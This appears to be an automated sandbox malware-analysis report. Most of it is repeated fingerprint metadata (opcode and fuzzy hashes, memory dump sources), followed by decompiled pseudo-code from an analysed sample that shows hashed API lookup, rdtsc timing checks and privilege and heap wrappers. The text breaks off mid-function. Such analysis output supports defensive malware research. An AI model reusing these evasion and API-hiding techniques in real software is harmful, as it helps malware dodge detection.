                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00408ED0(intOrPtr _a4) {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				char _v284;
                                          				char _v804;
                                          				char _v840;
                                          				void* _t24;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t39;
                                          				void* _t50;
                                          				intOrPtr _t52;
                                          				void* _t53;
                                          				void* _t54;
                                          				void* _t55;
                                          				void* _t56;
                                          
                                          				_t52 = _a4;
                                          				_t39 = 0; // executed
                                          				_t24 = E00407210(_t52,  &_v24); // executed
                                          				_t54 = _t53 + 8;
                                          				if(_t24 != 0) {
                                          					E00407420( &_v24,  &_v840);
                                          					_t55 = _t54 + 8;
                                          					do {
                                          						E0041BF30( &_v284, 0x104);
                                          						E0041C5A0( &_v284,  &_v804);
                                          						_t56 = _t55 + 0x10;
                                          						_t50 = 0x4f;
                                          						while(1) {
                                          							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
                                          							_t56 = _t56 + 0x10;
                                          							if(_t31 != 0) {
                                          								break;
                                          							}
                                          							_t50 = _t50 + 1;
                                          							if(_t50 <= 0x62) {
                                          								continue;
                                          							} else {
                                          							}
                                          							goto L9;
                                          						}
                                          						_t9 = _t52 + 0x18; // 0x5e14c483
                                          						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
                                          						_t39 = 1;
                                          						L9:
                                          						_t33 = E00407450( &_v24,  &_v840);
                                          						_t55 = _t56 + 8;
                                          					} while (_t33 != 0 && _t39 == 0);
                                          					_t34 = E004074D0(_t52,  &_v24); // executed
                                          					if(_t39 == 0) {
                                          						asm("rdtsc");
                                          						asm("rdtsc");
                                          						_v8 = _t34 - 0 + _t34;
                                          						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
                                          					}
                                          					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
                                          					_t20 = _t52 + 0x35; // 0xffff43e8
                                          					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
                                          					return 1;
                                          				} else {
                                          					return _t24;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                          • Instruction ID: 911db63d92bb27313539f87812f39d7602e647c51c5309350fa93bcc7f5e98a2
                                          • Opcode Fuzzy Hash: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                          • Instruction Fuzzy Hash: 8F210C72D4020957CB24D6749D42AFB73ACAB54314F44057FF989A3181FA38BB8987A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 195 407679-4076ca call 41bf80 call 41cb60 call 40a140 call 415aa0 204 4076cc-4076de PostThreadMessageW 195->204 205 4076fe-407702 195->205 206 4076e0-4076fa call 4098a0 204->206 207 4076fd 204->207 206->207 207->205
                                          C-Code - Quality: 61%
                                          			E00407679(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t14;
                                          				int _t15;
                                          				long _t23;
                                          				int _t28;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t38;
                                          
                                          				_t38 = __eflags;
                                          				asm("adc ch, ch");
                                          				asm("cdq");
                                          				asm("sbb [ebx-0x7c1374ab], al");
                                          				_t31 = _t33;
                                          				_v68 = 0;
                                          				E0041BF80( &_v67, 0, 0x3f);
                                          				E0041CB60( &_v68, 3);
                                          				_t14 = E0040A140(_t38, _a4 + 0x20,  &_v68); // executed
                                          				_t15 = E00415AA0( &_v68, _a4 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
                                          				_t28 = _t15;
                                          				if(_t28 != 0) {
                                          					_t23 = _a8;
                                          					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                          					_t40 = _t15;
                                          					if(_t15 == 0) {
                                          						_t15 =  *_t28(_t23, 0x8003, _t31 + (E004098A0(_t40, 1, 8) & 0x000000ff) - 0x40, _t15);
                                          					}
                                          				}
                                          				return _t15;
                                          			}

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: b1daca92d2074d12ecf6724030487195ec83ba286d0b60fa55f33f4f6033f87f
                                          • Instruction ID: a06e9c7ab8d2383a5806d67121bdd3b07c7950fca96f9adb7fb60e51f498fcf2
                                          • Opcode Fuzzy Hash: b1daca92d2074d12ecf6724030487195ec83ba286d0b60fa55f33f4f6033f87f
                                          • Instruction Fuzzy Hash: 0D01B931A902187AE72096959C42FFE671C9F45B54F04011EFE04FA1C1D6AD690647E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 210 407680-40768f 211 407698-4076ca call 41cb60 call 40a140 call 415aa0 210->211 212 407693 call 41bf80 210->212 219 4076cc-4076de PostThreadMessageW 211->219 220 4076fe-407702 211->220 212->211 221 4076e0-4076fa call 4098a0 219->221 222 4076fd 219->222 221->222 222->220
                                          C-Code - Quality: 82%
                                          			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E0041BF80( &_v67, 0, 0x3f);
                                          				E0041CB60( &_v68, 3);
                                          				_t12 = E0040A140(_t30, _a4 + 0x20,  &_v68); // executed
                                          				_t13 = E00415AA0( &_v68, _a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: e682585c6d42a928553e758ccfb2ccbbca61c78b357324a4b18dd2d6fca10666
                                          • Instruction ID: b49a75ff1ff2acd002f36703245cffc08f167651a8ee5295d5347c910167830d
                                          • Opcode Fuzzy Hash: e682585c6d42a928553e758ccfb2ccbbca61c78b357324a4b18dd2d6fca10666
                                          • Instruction Fuzzy Hash: 00018831A8022877E720A6959C43FFE776C9F45B54F044119FB04BA1C1E6A9790546EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 263 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                          C-Code - Quality: 100%
                                          			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                          				void* _t10;
                                          
                                          				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                          • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
                                          • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                          • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 266 41a620-41a651 call 41af60 RtlFreeHeap
                                          C-Code - Quality: 100%
                                          			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                          				char _t10;
                                          
                                          				_t3 = _a4 + 0xc90; // 0xc90
                                          				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}




                                          0x0041a62f
                                          0x0041a637
                                          0x0041a64d
                                          0x0041a651

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                          • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                          • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                          • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 269 41a780-41a7b4 call 41af60 LookupPrivilegeValueW
                                          C-Code - Quality: 100%
                                          			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          
                                          				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}




                                          0x0041a79a
                                          0x0041a7b0
                                          0x0041a7b4

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                          • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                          • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                          • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A660(intOrPtr _a4, int _a8) {
                                          
                                          				_t5 = _a4;
